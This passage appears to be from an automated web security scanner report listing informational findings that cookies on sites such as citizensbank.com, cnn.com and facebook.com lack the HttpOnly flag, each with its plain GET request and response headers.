Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:11 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 37376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.570. http://www.citizensbank.com/savings-and-cds/money-markets.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /savings-and-cds/money-markets.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings-and-cds/money-markets.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:09 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 27434


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.571. http://www.citizensbank.com/security/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /security/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:18:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:28:00 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 15127


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...

11.572. http://www.citizensbank.com/security/equal-housing-lender.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /security/equal-housing-lender.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security/equal-housing-lender.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:18:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:28:00 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 13931


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...

11.573. http://www.citizensbank.com/services/standard-overdraft-practices.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /services/standard-overdraft-practices.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/standard-overdraft-practices.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:38 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 27487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.574. http://www.citizensbank.com/small-business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /small-business/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /small-business/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:38:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:48:45 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 24618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.575. http://www.citizensbank.com/small-business/business-banking-online.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /small-business/business-banking-online.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /small-business/business-banking-online.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:38:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:48:45 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 20819


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl0
...[SNIP]...

11.576. http://www.citizensbank.com/small-business/business-checking-accounts.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /small-business/business-checking-accounts.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /small-business/business-checking-accounts.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:26:59 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 23745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl0
...[SNIP]...

11.577. http://www.citizensbank.com/small-business/business-loans.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /small-business/business-loans.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /small-business/business-loans.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:00 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 24102


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl0
...[SNIP]...

11.578. http://www.citizensbank.com/spanish/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /spanish/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /spanish/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:40:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:50:07 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 15918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...

11.579. http://www.citizensbank.com/student-banking/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /student-banking/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /student-banking/default.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:35 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 27414


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.580. http://www.citizensbank.com/student-banking/overview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /student-banking/overview.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /student-banking/overview.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:28 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 21138


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl0
...[SNIP]...

11.581. http://www.citizensbank.com/student-loans/overview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /student-loans/overview.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /student-loans/overview.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:40:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:50:13 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 20164


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.582. http://www.citizensbank.com/tools/SiteMap.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /tools/SiteMap.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools/SiteMap.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:40:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:54 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 174442


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...

11.583. http://www.citizensbank.com/tools/leaving.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /tools/leaving.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools/leaving.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Length: 0


11.584. http://www.citizensbank.com/tools/regionalgateway.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /tools/regionalgateway.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tools/regionalgateway.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: HiddenPopup=popup=False; path=/
Set-Cookie: HiddenError=error=False; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17351


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...

11.585. http://www.citizensbank.com/trufitstudentloan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /trufitstudentloan/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trufitstudentloan/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:48 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 47626


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.586. http://www.cnn.com/2011/TECH/web/01/28/egypt.internet.shutdown/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /2011/TECH/web/01/28/egypt.internet.shutdown/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/TECH/web/01/28/egypt.internet.shutdown/index.html HTTP/1.1
Host: www.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:34 GMT
Server: Apache
Set-Cookie: CG=US:TX:Dallas; path=/
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Thu, 03 Feb 2011 01:07:34 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 57590
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><script type="text/javascript" src="http://i.cdn.turner.com/cnn/.element/js/
...[SNIP]...

11.587. http://www.digitalia.be/software/slimbox  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitalia.be
Path:   /software/slimbox

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /software/slimbox HTTP/1.1
Host: www.digitalia.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: 60gp=R1864063875; path=/; expires=Sat, 05-Feb-2011 13:23:25 GMT
Date: Thu, 03 Feb 2011 01:06:39 GMT
Server: Apache/2.2.X (OVH)
X-Powered-By: PHP/5.3.5
X-UA-Compatible: IE=edge
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31291

...<!DOCTYPE html>
<html lang="fr">
<head>
   <meta http-equiv="Content-type" content="text/html;charset=UTF-8" />
   <title>Slimbox, the ultimate lightweight Lightbox clone .. digitalia.be</title>
   
...[SNIP]...

11.588. http://www.enewspf.com/latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.enewspf.com
Path:   /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html HTTP/1.1
Host: www.enewspf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: 15ec327c47efbc617f0bc517ff137074=lencdd7511juth6361pib24dj1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_teline_iii_tpl=ja_teline_iii; expires=Tue, 24-Jan-2012 01:06:40 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:06:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69019


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...

11.589. http://www.facebook.com/2008/fbml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=41jA_; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 01:06:40 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.590. http://www.filamentgroup.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filamentgroup.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.filamentgroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:18:11 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Set-Cookie: exp_last_visit=981353891; expires=Thu, 02-Feb-2012 22:18:11 GMT; path=/
Set-Cookie: exp_last_activity=1296713891; expires=Thu, 02-Feb-2012 22:18:11 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 22:18:11 GMT
Pragma: no-cache
